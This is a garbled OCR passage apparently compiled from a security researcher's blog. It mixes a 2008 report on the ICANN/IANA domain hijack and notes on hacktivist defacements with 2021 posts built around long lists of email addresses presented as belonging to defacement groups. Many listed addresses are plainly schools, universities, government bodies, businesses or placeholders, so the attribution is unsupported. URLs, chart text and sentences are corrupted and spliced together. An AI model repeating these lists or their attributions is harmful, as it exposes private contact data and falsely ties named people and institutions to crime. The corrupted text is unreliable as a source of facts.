admin@compubyte.vg 
net1001.net@gmail.com 
PQY@HOTMAIL.COM 
homjea@163.com 
mohalfares@gmail.com 
cyberkov@nym.hush.com 
abuabdou.mohammed@gmail.com 
sitenevic@gmail.com 
info@exposurepdp.com.au 
zayizef@gmail.com 
elmanara@gmail.com 
hydomains@yandex.com 
tsuyama@sparkle-ark.co.jp 
hizbuttahrirmedia@gmail.com 
tevhidigundem01@gmail.com 
al _jarba@yahoo.com 
tariqghazniwal@yahoo.com 
ed@albawaba.com 
2028403301@qq.com 
neharikarai@outlook.com 
bijankani@gmail.com 
puisSance-group@yandex.ua 
milenradumilo@gmail.com 
info.bj@gmail.com 
ALITEAIB@GMAIL.COM 
xpj09166@gmail.com 
HTM.ITTECH@GMAIL.COM 
mawage3@gmail.com 
naeemchaudhry@hotmail.com 
gt3030@yahoo.com 
SAAID@ALODA.ORG 
9235365@GMAIL.COM 
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aa999nn@hotmail.com 
alsamedon@yahoo.com 
juturna _alaska@hotmail.com 
cancnebut@gmail.com 
lic210826@gmail.com 
crywolel@yahoo.com 
dougsanders1070@gmail.com 
834174739@qq.com 
dvilpmntitd@gmail.com 
aalmaree@gmail.com 
almubarak@hotmail.co.uk 
Failyl1929@cheerful.com 
info@bengisu.com.tr 

SSSAS _66@YAHOO.COM 
hataya.hachi@gmail.com 
souh@mail.com 
289626@hush.sc 
hpsoro@yahoo.com 

wins ku@yahoo.com 
bfl@sitematrix.com 
abdulkerimeski@hotmail.com 
charlie _elias@yahoo.com.au 
salahuddinvc@hotmail.com 
adoaenlg@yahoo.co.jp 
jose29@gmail.com 
fad.lee@yahoo.com 
basomidi@gmail.com 
rafatkatta@gsibc.net 
albaylsan@gmail.com 
eng.rimawi@gmail.com 
omori@sakejapan.com 
ml-link@ioix.com 
abumos3b33@hotmail.com 
maherzain.0071@gmail.com 


shiaweb2@yahoo.com 
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gulf1001@yahoo.com 
249442918@qq.com 
shenxingyu888@outlook.com 
wobuyaoqgiand@163.com 
hizb.russia@gmail.com 

Stay tuned! 


17.6.4 Dancho Danchev’s Law Enforcement and OSINT Operation "Uncle George" - 
Sample Graphics (2021-06-13 18:09) 


[1] 


Kapquur Request 


Dopym 
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Dear blog readers, 


This is Dancho and I’ve decided some of the graphs which | produced part of my currently 
ongoing Law Enforcement and OSINT Operation called "[2]Uncle George" where the ultimate 
goal would be to assist fellow researchers vendors and organizations including U.S Law 
Enforcement and the U.S Intelligence Community on its way to track down and prosecute the 
cybercriminals behind these campaigns. 


[3]Grab a copy today! 
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These script kiddies using SQL injection vulnerabilities within the affected sites, since 
they indeed managed to deface several other as well, seem to have also participated in the 
2006 cyber conflict sparkled due to the [3]the kidnapping of three soldiers. One of their 
defacements remains still active ( aviv.perffect-x.net/deface.html ) 


"We will stand against the Islam until the kidnapped soldiers, Gilad Shalit, Eldad Regev 
and Ehod Goldvaser will be return, We will attack arabic servers and site which support the 
Islam and protest against the zionism " 


What if every script kiddie with a SQL injection scanners goes into politics? It’s a mess 
already. 


Related posts: 

[4]Monetizing Web Site Defacements 

[5]Pro-Serbian Hacktivists Attacking Albanian Web Sites 
[6]The Rise of Kosovo Defacement Groups 

[7]A Commercial Web Site Defacement Tool 

[8]Phishing Tactics Evolving 

[9]Web Site Defacement Groups Going Phishing 
[1O]Hacktivism Tensions 

[11]Hacktivism Tensions - Israel vs Palestine Cyberwars 
[12]Mass Defacement by Turkish Hacktivists 
[13]Overperforming Turkish Hacktivists 

[14] 


. http: //ddanchev. blogspot . com/2006/07/hacktivism-tensions-israel-vs html 

_ http: //wvy. ynetneve. con/articles/0,7940,1~3560756,00. heal 

. http: //www.mfa.gov.il/MFA/MFAArchive/2000_2009/2004/1/Israe1i#20MIAs 
_http://adanchev blogspot .con/2008/06/nonet izing-veb-site-detacenents,Hénl 

| http://adanchey blogspot. con/2008/05/pro-serbian-hackvivists-attacking. heal 

_ http: //adanchey blogspot .con/2008/04/rise-of-kosovo-defacenentgroups html 

| http://adanchev blogspot .con/2008/04/connercial-veb-site-defacenent-tool htal 
_ http: //adanchey blogspot .con/2008/04/phishing-tactics-evolving html 
_http://adanchev blogspot .con/2008/04/seb-site-defacenent~groups- going. heal 
10, http: //ddanchev. blogspot .con/2006/02/hacktivien- vensions. ita 

12, ttp://ddanchev. blogspot con/2007 /11/nass-defacenent~by-turkish-hacktiviets tal 
13, rtp: //adanchev. blogepot .con/2007/1/overper forming-turkish-hacktivists. html 
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4.6.18 ICANN and IANA’s Domain Names Hijacked by the NetDevilz Hacking Group 
(2008-06-27 02:58) 


[1 


— 


1609 


16064 


[6] 


CORTE) (Soiree 9) 


H 


Noxazath Coobusese Or... (2) 


x x 


Dimension 2 (0.171, 15.16%) 


hxxp 


_NNe® 


aS 


FORUMS DISCUSSION 


ee __ topic__ 


~ ARCHIVE ~~ forum 


SHADOWCREW 


Dimension 1 (0.2364, 20.96%) 


[7] 


16065 


[8] 
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682.197.131.103 


—mi ~ 
nsl.atspace.com <———— NET 
Br a, www2.atspace.com 
7 Ee 
i 82.197.131.106 NET : ia 
ph x . = = $2,197,128.019 ———— AS13237 
= see or 
aX - NET. 
Ciana.com ~) mail.iana.com 
NS 
eS 7 re 
\ A ge 82.197.131.104 —————_> mail.a&tspace.com 
\ nsZatspace.com 


The official domains of [2]ICANN, the Internet Corporation for Assigned Names and Numbers, 
and [3]IANA, the Internet Assigned Numbers Authority were hijacked earlier today, by the 
[4]NetDevilz Turkish hacking group which also [5]hijacked Photobucket’s domain on the 18th 


of June. [6]Zone-H mirrored the defacements, some of which still remain active for the time 
being. 


[7] 
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[18] 
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[19] 
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[20] 
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[21] 
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[22] 
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[23] 
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[24] 
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Received responses: 35 Fail 


Angra dos Reis, Brasil 


St Leonard, OC, CA 


Hamilton, Ontario, 
Canada 


Montreal, QC, Canada 


Montreal, OC, Canada 


Zagreb, Croatia 


Nanterre, France 


Frankfurt, Germany 


Amsterdam, NL 


Amsterdam, 
Netherlands 


Http error :Unix.Unix_error(_, 
*check_connect*, 
“iana.com:80:No route to 
host") 


Http error :Unix.Unix_error(_, 
“check_connect*, 
“iana.com:80:No route to 
host") 


Http error :Unix.Unix_error(_, 
“check_connect*, 
“lana.com:80:No route to 
host") 


Http error :Unix.Unix_error(_, 
“check_connect", 
“iana.com:80:No route to 
host") 


Http error :Unix.Unix_error(_, 
“check_connect*, 
“iana.com:80:No route to 
host") 


Http error :Unix.Unix_error(_, 
“check_connect", 
“iana.com:80:No route to 
host") 


Http error :Unix.Unix_error(_, 
“check_connect", 
“iana.com:80:No route to 
host") 


Http error :Unix.Unix_error(_, 
*check_connect", 
“iana.com:80:No route to 
host") 

Http error :Unix.Unix_error(_, 
“check _connect*, 
“iana.com:80:No route to 
hast") 

Http error :Unix.Unix_error(_, 
*check_connect’, 
“iana.com:80:No route to 


3.39 sec 


3.35 sec 


7.90 sec 


3.45 sec 


12.45 sec 


7.59 sec 


7.83 sec 


11.54 sec 


44.16 sec 


11.58 sec 


192.0.34.69 


192,0,34.69 


192,0.34.69 


192.0.34.69 


192.0.34.69 P 


192.0.34.69 


192.0.34.69 


192.0.34.69 


192.0.34.69 


192.0.34.69 


AngraHost 


PG Enterprises 


networxHosting.com 


HostIran Networks 


Hosting Centar 


Alorys 


Crohoster 


Crohoster 


JouwNaam 
Webhasting 


Read more here - "[8]JICANN and IANA’s domains hijacked by Turkish hacking group". A single 
email appears to have been used in the updated DNS records of all domains, logically courtesy 
of the NetDevilz team - [9] foricannl1230@gmail.com 


More details will be posted as soon as they emerge. 


UPDATE: 


The ICANN has restored access to its domains, and as in every other DNS hijacking the 
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Distribution of keywords (Frequency) 


& 
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Distribution of keywords (Frequency) 


PROXY 2,1% CISCO 2.1% 
DUMPS 2,19 

MAPASMHE 2.0 

ODOS 1,94 
PRICE 1.7% 
YOUTUBE 1,7% 
CKPUNTUHE 1.7% 
BITCOIN 1,7% 


APODAKA 2.3% 
CTUNNEP 2.2% 

; ONYQUNKA 2.3% 
ORIGIN 2,3% 


AMEX 2.4% 
CNOMNEP 2.6% 


PAYMENT 1.7% ONYDEPb! 2.7% 
WEBMONEY 1,7% 
AKKAYHTA 1.7% CNAMEPbI 2,7% 
a ae AHDPOUD 0.7% 
pcan " nesneRt 03% 
conam 16% rtp 
AMAZON 1,6% © REPYESTE 0, 
TOBAPOB 1.6% MERARBE BID 9% 
CEPBEPA 1,5% " DERRRCIT RED GE 0,9% 
Yy3BUMOCTb 1.5% 7 NPBYIPYED! 0.9% 
SSH 1,4% seneSSHSE 99% 
ago CLOUDRARAQAT#41.1% 
NAPONU 1.4% PACCBINKA GEPBHCOB 1.1% 
’ POKYMEHTbI 1.2% 


Stay tuned! 


1. https://1.bp.blogspot . com/-eRc9a0t4C88/YMYsNbB1imI / AAAAAAAANUA/xzf X0aZ8_BQgwR_BqBU-xyqCvweloc45gCLcBGAs YHQ 
s669/clusters-20191005094320. png 
2. https://ddanchev. blogspot .com/2021/04/dancho-danchevs-1law-enforcement-and.htm 


3. https: //ddanchev. blogspot .com/2021/05/cybercrime-forum-data-set-for-2019-and.htm 


4. https://1.bp.blogspot . com/- JO3nuSDZEkY/YMYsNRAxT3I / AAAAAAAANT8/BO5qphn5 1NsqMBAkSwLKXI_gILzFBdI3QCLcBGAsYHQ 
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5. https: //1.bp. blogspot .com/-c4f_hapsRLc/YMYsNhXC8EI/AAAAAAAANUE/v9gBTa3rFGQ-mv725£MW_J&mzuBShZmnQCLcBGASYHQ 
6. https: //1. bp. blogspot . com/-k2fUdyCraR4/YMYsK# JRmIT/AAAAAAAANSO/wDKQaYUxAulCOGF ia0hSqjdqrW_WVisJwCLcBGAsYHQ 
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17.6.5 Exposing a Currently Active Email Address Portfolio of Web Site Deface- 
ment Groups or Lone Web Site Defacement Groups - An OSINT Analysis 
(2021-06-14 23:49) 


This site Has Bean Hacked By Dr.Angel .,! chose better security next time ! 


a 


» Nothing Can Stop me © 
~ Try better security Next time — 
Dr.Angel..MsN: 6000 (0) 00H 
WeB.SniPeR ..MSN: 66) ) 005 Co 


Maybe | well visit this site Again 


Dear blog readers, 


This is Dancho and I’ve decided to share what appears to be one of the most comprehensive 
and up-to-date and relevant email address portfolio of personal email addresses belonging to 
high-profile Web site defacement groups including lone Web site defacement groups with the 
idea to assist U.S Law Enforcement and the U.S Intelligence Community on its way to track 
down and prosecute the cybercriminals behind these campaigns. 


Currently active portfolio of high-profile email address accounts belonging to high-profile 
Web site defacement groups including lone Web site defacement groups: 


alcatraz765@infinity-cyber.org 
webmaster@pa-watansoppeng.go.id 
had6hO5t@gmail.com 
contacto@madrimasd.org 
ijikojan25@gmail.com 
commercial@hadjtaharsteel.com 
mrgalanga4@gmail.com 
kakeguraiofficial@gmail.com 
hiruka404@gmail.com 
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babymoongans@protonmail.com 
elvln4@yahoo.com 
tnjones889@gmail.com 
skullcyberarmy250@gmail.com 
hackerbaru321@gmail.com 
exemplo@ex.com 
Antonsofyan@gmail.com 
lahbodozamat@gmail.com 
Algiyaramdanal23@gmail.com 
roouterhyvz@yahoo.com 
laggerghost@merahputih.id 
root@dislanze.org 
rregeggr2@gmail.com 
Titid@gmail.com 
momon@gmail.com 
admin@gmail.com 
you23052001@gmail.com 
032F@gmail.com 
hacked@email.com 
Sangok123@gmail.com 
Jancon@gmail.com 
mrn6t8505@gmail.co 
akbargansO88@gmail.com 
Cek@gmail.com 
Kulubis@gmail.com 
Gmail@gmail.com 
Manusia211@gmail.com 
saitamaz@gmail.com 
Kabur223@gmail.com 
Ozazz@gmail.com 
poisonsh@gmail.com 
greatindonesian72@gmail.com 
fathurramadhan2004@gmail.com 
Fuck@gmail.com 
Pspallakakamanana@gmail.com 
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clowncyber52@gmail.com 
a@gmail.com 
didikoioi62@gmail.com 
defacerkuy@gmail.com 
hacked@gmail.com 
chestazaki@gmail.com 
Xez@gmail.com 
tutupbotol8999@gmail.com 
duar@gmail.com 
Kiki@gmail.com 
bisajadu3@gmail.com 
asriadi88clll@gmail.com 
chestakalimanahkulon@gmail.com 
chestawhz@gmail.com 
Kontolasu@gmail.com 
zaki@gmail.com 
tutupbotol899@gmail.com 
mr.11.4.0.4.notfound@gmail.com 
mr.tanzx@gmail.com 
Zildaneundan09@gmail.com 
rusakutub@my.com 
dreantech1807@gmail.com 
kontol@gmail.com 
madwomen@gmail.com 
mrsoapking@gmail.com 
nsb.frex@gmail.com 
Memek@gmail.com 
Deng277@gmail.com 
Kar080804@gmail.com 
anon545@gmail.com 
dubstepabstrak@gmail.com 
heniaprilia892@yahoo.com 
vnke@gmail.com 
kimak@gmail.com 


Kntl@gmail.com 
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naufalismail00@protonmail.com 
Palembang3@gmail.com 
Xjzjsi@gmail.com 
sass@gmail.com 
Ayamngentot@gmail.com 
Viana@yahoo.com 
mtsaddarain@gmail.com 
adikiswanto@gmail.com 
Regi0l@gmail.com 
Pranchocolate@gmail.com 
youremail@domain.com 
jorenrapini@gmail.com 
smppasundansubang@gmail.com 
Anonymous.Mrx404@gmail.com 
blackhact@gmail.com 
bocilf36@gmail.com 
wordpress@example.com 
kelelawarcyberteam@gmail.com 
info@easylegal.ca 
info@cccreciendoconjesus.com 
email@agency.com 
info@alnakhlahisland.com 
dichvucntt37@gmail.com 
servicioS@sosperugrafico.com 
support@onlinepsh.com 
contact@support.com 
admin@rosokmobil.com 
info@jebruna.com 
akademik@unulampung.ac.id 
kademik@unulampung.ac.id 
contact@martfury.co 
hotro@hungphatnoithat.com 
support@labodegafood.com 
prachinburi.honda@gmail.com 
inquiry@btwinsurances.com 
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info@clubleaguegolf.com 
info@salumilafabbrica.com 
info@isfer.net 
info@estoniawork.com 
henta.agri@gmail.com 
hohifashion@gmail.com 
lorenubuy@gmail.com 
info@safensecurelife.com 
info@la-studioweb.com 
contact@yoursite.com 
TNHHETBNAMAN@gmail.com 
contact@company.com 
info@zgautomation.net 
contact@domain.com 
mrv7680@gmail.com 
rosamysticakpm24@gmail.com 
akunfacebookdimas@gmail.com 
balaidesasembawa@gmail.com 
desaku@gelang.desa.id 
desaku.karangjati@gmail.com 
kedawung@yahoo.com 
purwatysetiawan8190@gmail.com 
dextergang1337@gmail.com 
situwangi@gmail.com 
desaku@bedana.desa.id 
afifnurrohmi@gmail.com 
Thai.thaiestate@gmail.com 
khanzadatech786@gmail.com 
sprivada@sanpedro.gov.ar 
mesaentradas@sanpedro.gob.ar 
modernizacion@sanpedro.gob.ar 
admin@admin.com 
rl13shere98@gmail.com 
radivganteng17@gmail.com 


g3x1337@gmail.com 
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radivganteng@gmail.com 
SkyXSec@JCS.id 
Zfahrel@gmail.com 
Danc5553@gmail.com 
info@smak1metro.sch.id 
Anjay@indonesia.net 
test@gmail.com 
linux.ded@gmail.com 
Bangsam@gmail.com 
Bapak@gmail.com 
ZZzS@gmail.com 
lalo.jensin@andyes.net 
n@g.com 
trikpedia@gmail.com 
essenjitutasik@gmail.com 
grizzvectorl17@gmail.com 
pppo@asdad.com 
wori@about.com 
aariv.sunil@andyes.net 
clowwy@gmail.com 
clowwy@gmail.co 

smip _teladan@yahoo.com 
What@indonesia.go.id 
dewifirsanti@gmail.com 
info@smpnimandau.sch.id 
Imsuck@gmail.com 
Imsuck@gmail.co 
lawancorona@gmail.com 
figopaing605@gmail.com 
senjayaherdiana@gmail.com 
duniagoncang46@gmail.com 
bastianherdil@gmail.com 
ristalestari@gmail.com 
swiro7060@gmail.com 
widaralautO@gmail.com 
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correct records will be updated on a mass scale in 24/48 hours. Some press coverage : 


[10]Ankle-biting hackers storm net’s overlords, hijack their domains 
[11]Hackers hijack critical Internet organization sites 

[12]No such thing as a guaranteed safe site 

[13]Good Always Comes Out of Bad 

[14]Hackers Deface ICANN, IANA Sites 

[15]ICANN publicity may have triggered malicious behavior 
[16]Turkish Hackers Relive Memories in Photobucket 


[17]ICANN Web Site Compromise 


© Terminal Australia © Terminal U.S.A. 


(geek@netherlands ~]# 


Moreover, according to an [18]article at Computerworld, the ICANN weren’t aware of the hijack 


"A spokesman for ICANN contacted Friday morning wasn’t aware of the hack, and de- 
clined comment until he find out more." 
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info@smpningasem.sch.id 
Diobrando@gmail.com 
Naufalgaming567@gmail.com 
desidesiazizO89@gmail.com 
nana@gmail.com 
ahuro@mail.com 
aulia.arifoudiman@gmail.com 
Cak.sapari2Z008@gmail.com 
03.reyhan@gmail.com 
TuanKontol@gmail.com 
info@sman14gowa.sch.id 
Konodiodaa@gmail.com 
info@smpnlkelapa.sch.id 
Imsucks@gmail.com 
1234567890@123456.com 
Attacker@gmail.com 
a@b.com 


hehe@gmail.com 


info@smanegerilpadangsidimpuan.sch.id 


Sucks@gmail.com 
adit@gmail.com 


hfhgfaw@gmail.com 


FA000000000000000000@in.co 


warnet.adiratna@gmail.com 
smk.wpung@yahoo.co.id 
v@gmail.com 
mail@gmail.com 
info@sman1subah.sch.id 
Cok@gmail.com 
ijin@gmail.com 
nene365@naver.com 
dawdwa@wdaw.com 
aswj@gmail.com 
info@smkn1barumun.sch.id 


Njenk@gmail.com 
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aaa@aa.com 
croot@gmail.com 
hasnikhoirunnisa80@gmail.com 
rajaessen61@gmail.com 
jamkhodua@gmail.com 
smkn1pwr@yahoo.co.id 
Xxxx@gmail.com 
fa@gmail.com 
asharyari@ymail.com 
info@icbatam.sch.id 
Asw@gmail.com 
Hshshs@gmail.com 
Hshshs@gmail.co 
Nabwwb@gmail.com 
wdwpwdaw@gmail.com 
koaksokdx@gmail.com 
klqdw@gmail.com 
XXXXXX@gmail.com 
XXXXXX@gmail.co 
cimuut05@gmail.com 
indraguru_28@yahoo.com 
tatinurawati78@gmail.com 
test@yahoo.com 
info@min1lmagelang.sch.id 
Lah@gmail.com 
xnxx@gmail.com 
sman2.medan@yahoo.com 
wkwk@gmail.com 
arieframaxx@gmail.com 
Panjaitan96@gmail.com 
ajai71118@gmail.com 
ptq@lextran.co.il 
apsrajasthan@gmail.com 
randyrahmatsaputra26@gmail.com 
cv.berkatmtr@yahoo.com 
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stai.brebes2@gmail.com 
info@gaidotravel.com 
haji@gaidotravel.com 
umroh@gaidotravel.com 
info@astakanti.co.id 
diskominfo@natunakab.go.id 
lingkungan@akprind.ac.id 
info@atpika.com 
admin@uniyos.ac.id 
info.sanastudio@gmail.com 
wpinfo@humnet.ucla.edu 
info@academicintegrity.eu 
webmaster@academicintegrity.eu 
jerkwater@frontiernet.net 
halo@rumah-pintar.id 
prodipe@ikipgunungsitoli.ac.id 
sttkhatulistiwa.ac.id@gmail.com 
dokter@aditiawan.com 
rahmat@pnp.ac.id 
help@seravo.com 
sales@cryptotheme.com 
sales@cryptrotheme.com 
info@creativecommons.org 
pyzluclufer@gmail.com 
panduparamitra@yahoo.com 
mulligansmaui@gmail.com 
qbar.padang@gmail.com 
wawan.rachmat74@gmail.com 
amelia@lymphandfloorphysio.com.au 
info@intels.com.au 
LuffyGanz23@gmail.com 
drizzleudin6O@gmail.com 
labkom@poltekkes-kemenkes-bengkulu.ac.id 
admin@ciuss.com 


admin@rsarbundallg.com 
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hai.djpb@kemenkeu.go.id 
Iptik@unib.ac.id 
diktilithbang@muhammadiyah.id 
info@ctzonedehasenbkl.com 
info@sttab.ac.id 
humas@umb.ac.id 
youremail@example.com 
fisipol@umb.ac.id 
fikes@umb.ac.id 

ft@umb.ac.id 

fkip@umb.ac.id 
hukum@unived.ac.id 
kemahasiswaan@umb.ac.id 
baak@umb.ac.id 
fkip@unived.ac.id 
ekonomi@unived.ac.id 
info@unived.ac.id 

dekanat fmipa@unib.ac.id 
datastikestms@gmail.com 
miyahonor316@gmail.com 
bappeda@deliserdangkab.go.id 
program.pimen.bpsdm@gmail.com 
evalaptekpim@gmail.com 
evalappimen@gmail.com 
program.fungham@gmail.com 
evaluasi67@gmail.com 
sistimjarkom@gmail.com 
kec.kasihan@bantulkab.go.id 
email@carijawaban.id 
ivanxploit@gmail.com 
clownseczteam@gmail.com 
admin@shopp.my.id 
info@xyz-adventure.com 
support.smanda@gmail.com 
stmnegerigk@yahoo.com 
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info@givingpress.com 
cupayme@gmail.com 
webmaster@ctan.org 
jakpp@unhas.ac.id 
jakpp.unhasmks@gmail.com 
bouziri.tarak@gmail.com 
bpsdmdjateng@gmail.com 
bpsdm@riau.go.id 
info.b2tks@bppt.go.id 
thomas.hardy@bmkg.go.id 
Yanlik@menpan.go.id 
hackersindo167@gmail.com 
email@i-create.com 
batya@batyabricker.co.za 
webmaster@uspto.gov 
sales@keenco.com.tw 
wow.ajuju@gmail.com 
bookings@lesololodge.co.za 
Info@rahatk.sa 
humas@padang.go.id 
support@oxygenbuilder.com 
yourmail@gmail.com 
nlc3cracker.id@gmail.com 
officialdn07@gmail.com 
info@jupitersecurity.in 
dn7ganzz@gmail.com 
swatfigterxploit@gmail.com 
d30Tx@yandex.com 
tangerangxploit@yahoo.com 
TangerangXploitteam@yahoo.com 
seminari.st.paulus.palembang@gmail.com 
alf404hexs@gmail.com 
alanmaulana1343@gmail.com 
smkn6jbr@gmail.com 


Tnjonesgans11@gmail.com 
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kabarkubarmahulu@gmail.com 
arillahat@gmail.com 
kaorimiyazonotan@gmail.com 
diluxgans@gmail.com 
BookNow@langscontinental.com 
booknow@langscontininental.com 
yangsbuyingjewelry@gmail.com 
darkwebd7@gmail.com 
info@lampungprov.go.id 
humasmarketingkerjasama@pppkpetra.sch.id 
info@sman2cibinong.sch.id 
info@ppitimamsyafii.sch.id 
info@reginapacis.sch.id 
smafonsvitae2jkt@gmail.com 
info@mandarussalam.sch.id 
smpitasalam@gmail.com 
ponpes@mticanduang.sch.id 
sma _hangtuahl surabaya@yahoo.co.id 
mtsnbawujepara@yahoo.com 
kundservice@gefvert.se 
sns2019@akademikonferens.se 
office@cipm.md 
info@ospelthaas.li 
bidpropam.banten@polri.go.id 
migflow@listes.uclouvain.be 
path@creth.org 
diriwfm@iwfm.buet.ac.bd 
pengl060380@gmail.com 
rootdream403@gmail.com 
irwanmartin8@gmail.com 
info@ranmalbeach.|k 
dandialien525@gmail.com 
nzxsx7@gmail.com 
sataniccyberteam@gmail.com 
McSlOvv@gmail.com 
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irvanberuq@linuxmail.org 
nlc3defacer.id@gmail.com 
info@smpbudhidharma.sch.id 
paste@gmail.com 
mosopo9348@adeata.com 
andika@aark.us 

aSS@jj.co 
info@kodeforest.com 
pkpritrunojoyo@gmail.com 
info@pabrikrakbaja.com 
dongkrak12@gmail.com 
qjmlilodafloatry@gmail.com 
M2XR1 _5@incubic.pro 
barokahherbal1l704@gmail.com 
krystof.kiante@andyes.net 
agunghoba555@gmail.com 
herbalbisal7@gmail.com 
umiqoury@gmail.com 
nicedre4m@yahoo.com 
nlcedre4m@yahoo.com 
skckpoldantt@yahoo.com 
info@yourstore.com 
smpn15@disdik.semarangkota.go.id 
info@jiirss.org 
hotelrameshiyer@gmail.com 
support@eglobalsoftware.com 
billing@eglobalsoftware.com 
business@leadviewconsulting.com 
telaso@gmail.com 
fakhriganz404@gmail.com 
sahadarkangel@gmail.com 
info@kainattravels.com 
donate@opencart.com 
info@thethemspro.com 


dprdtabanan@gmail.com 
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fmskuduscrew@gmail.com 
info@smksadarwisataruteng.sch.id 
info@classicpackaging.in 
principaldhanas@yahoo.com 
camatutara@pontianakkota.go.id 
fmskudusc@gmail.com 
tikushaxor@gmail.com 
prmnnewsroom@pikiran-rakyat.com 
adpim@kalbarprov.go.id 
potoolsl@gamil.com 
ilyasnafsoh@gmail.com 
wahana.balloonl@gmail.com 
rarafebtarina@gmail.com 
secretary@sreema.org 
info@rumahweb.com 
teknis@rumahweb.com 
info@katama.co.id 
info@poliven.ac.id 
email@domainname.com 
pemasaran@granesia.co.id 
vke95@hotmail.com 
info@arvicoindonesia.com 
info@ptabb.com 
abbaru@gmail.com 
mohseng1995@gmail.com 
lalisal28jsj@gmail.com 
info@premierentp.in 
premierentp97@gmail.com 
cs@jd.co.th 
info@metrogaurdspk.com 
cs@metrogaurdspk.com 
konsolll@gmail.com 
ramaditya84@gmail.com 
Fffffffall@gmail.com 


KineFreedom@gmail.com 
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contacttochaplin@gmail.com 
n944421@gmail.com 
boiboi@example.com 
asuu@gmail.com 
saintisxploit@gmail.com 
01001000@yahoo.com 
gapfinderindonesia@gmail.com 
terkentot@gmail.com 
backcat.official@gmail.com 
Uuu@gmail.com 
anonhack138@gmail.com 
tested@gmail.com 
Janganganggu@gmail.com 
dataj84942@1Lheizi.com 
dokmfkm@gmail.com 
wadads@gmail.com 
hacked@havked.com 
loli@gmail.com 
Kontol212@gmail.com 
abc@gmail.com 
kenazcam6@gmail.com 
jjajajj@gmail.com 
ajg@gmail.com 
anjayani@gmail.com 
Gda@gmail.com 
syawalgans@gmail.com 
hacknyet@gmail.com 
Junigshjshwhah@gmail.com 
rushervsbbdbsbsb@gmail.com 
thd@gmail.com 
metrokesamben99999@gmail.com 
Kskaks@nansn.com 
bahauddinganteng@gmail.com 
b4h4@gmail.com 
jancuk58@gmail.com 
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cyberjahanam777@gmail.com 
Flowerganz76@gmail.com 
Flowzrilseven789@gmail.com 
socialindocyber@apage.com 
ar7188674@gmail.com 
Auah@gmail.com 
Bebas@gmail.com 
gansdicky433@gmail.com 
kaskamal44@gmail.com 
Marzukiahmad@gmail.com 
wahyuuu542@gmail.com 
yuyunasu6@gmail.com 
Hackersjanda321@gmail.com 
adespross123@gamil.com 
rafivengeancesaxo@gmail.com 
salmankasave7@gmail.com 
ASDHASDASDB@gmail.com 
jsodhdh@gmail.com 
SetanGila666@gmail.com 
Hehdhd@gmail.com 
Gasut@gmail.com 
bauabsjsjsjsj@gmail.com 
crewsorogethong@gmail.com 
Assalamualaikum@gmail.com 
Ahhhmntp@gmail.com 
gamss@gmail.com 
user134.cyberteam@gmail.com 
canda@gmail.com 
senjurama888@gmail.com 
Jkm@gmail.com 
Cupugaming@gmail.com 
mrx88@gmail.com 
dafie7357@gmail.com 
Adlyiqbal015@gmail.com 

tiy tiy @hotmail.com 

16102 


Let’s hope that they issue a statement on the situation once they know more about how 
it happened. More comments follow from the ICANN - "[19]Turkish Hacker Group Strikes Again, 
This Time Victims are ICANN and IANA" : 


"Latest response received by CirclelD from ICANN states that the problem took place at 
their registrar level. A Whois look up shows Register.com as the registrar for the hacked 
domains. ICANN has further stated that the registrar "fixed the dns redirection within 20 
minutes of us notifying them of the problem. The registrar is actively investigating what 
happened and has promised to report back to us on what happened." 


This is the second time in a row when DNS hijacking happens through Register.com compared 
to [20]Comcast.net’s one done through Network Solutions. 


1. ttp://4.bp.blogspot.com/_wICHhTiQmrA/SGQg0dcE8AI/AAAAAAAAB2k/WhMcLZS_2Ec/s1600-h/netdevilz_icann_iana_at 


2. ivep://en. wikipedia org/viki/ TOM 

3. http://en.wikipedia. org/wiki/Internet_Assigned_Numbers_Authorit 

ds cep /asncher logan con] 2000 /Ou/upctea to pueecoucvera me niaetieg neal 
5, htep:/ /ologs zdnet.con/security/"p=1265 

6. ety: //o zone. org/content/view/ 1401/30] 


ttp://3.bp.blogspot.com/_wICHhTiQmrA/SGQ5Xyi9PiI/AAAAAAAAB20/62_Zqwtp4MQ/s1600-h/netdevilz_icann_ianal. 


7. 
8. http://blogs .zdnet .com/security/?p=1356 


9. http: //blogs.zdnet .com/security/images/netdevilz_icann_iana_atspace1. JP 


13. http://isc.sans.org/diary.html?storyid=463 
14. http://www. thewhir.com/marketwatch/062708_Hackers_Deface_ICANN_IANA_Sites.cf 


20. http://blogs.zdnet.com/security/?p=121 


4.6.19 The Malicious ISPs You Rarely See in Any Report (2008-06-30 15:11) 
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Memrmemk@gmail.com 
ardyan.xyz@gmail.com 
Gkgkg@gmail.com 
ploynarinn@imc-community.cf 
Kepo@gmail.com 
Huyyyuhh1780@gmail.com 
yardankun@gmail.com 
Zappagans212@gmail.com 
J@gmail.com 
Heckers15@gmail.com 
Jdjfkfj@gmail.com 
Cayip@gemail.com 
mrsongo@gmail.com 
Nuub@gmail.com 
bodo@gmail.com 
xytudz@gmail.com 
defecer@gmail.com 
r@gmail.om 
Mungkintaul4@gmail.com 
kresnacorp0112@gmail.com 
Owh@gmail.com 
Hybuza@gmail.com 
Asu@gmail.com 
hfajar211@gmail.com 
Xgans@gmail.com 
lass.attacker.cber@gmail.com 
rizkyb633@gmail.com 
Putra0lL@gmail.com 
slind3r@mail2tor.com 
bintangcassanova6757@gmail.com 
KingPowerganz@gmail.com 
anonymous@email.com 
Dchsosspsp@gmail.com 
Baaapaap@gmail.com 
DreamXmitsuki@gmail.com 
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rorxgans@gmail.com 
dzxlyuwu@gmail.com 
fakeemail@gmail.com 
query7@gmail.com 
rustamsport@gmail.com 
Afgeg@gmail.com 
CrazyGans@gmail.com 
irfanur@gmail.com 
jsioajsaisj@gmail.com 
Xseac _xploit@gmail.com 
Secdetnotnot@gmail.com 
Kimochi@gmail.com 
ferjosaja@gmail.com 
king.lion@gmail.com 
yanglekgadir@gmail.com 
misterblack298@gmail.com 
hafif@yahoo.com 
getrekt@gmail.com 
gamingggwp724@gmail.com 
nillaarum585@gmail.com 
Suhermanto399@gmail.com 
hmmm@gmail.com 
Maafngabs@gmail.com 
Adkk8kkk@gmail.com 
YAELAHkontol@gmail.com 
alfan@gmail.com 
acigendut6@gmail.com 
Akusayangkamu@gmail.com 
jzia863@gmail.com 
77@gmail.com 
Gans@gmail.com 
Ketikung@gmail.com 
Danjimhaha@gmail.com 
indonesiahackercommunity@gmail.com 
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adrianwijaya386@gmail.com 
bukanhakel@gmail.com 
gghg@gmail.com 
emanglusiapaxixixi@gmail.com 
S@gmail.com 
Bosi@gmail.com 
ssasdasdas@gmail.com 
Watiniciguk@gmail.com 
yanxcod3@gmail.com 
Koetamvans@gmail.com 
Oranggoblokkoebebas@gmail.com 
Akkakaka@gmial.com 
Cipengstreet21@gmail.com 
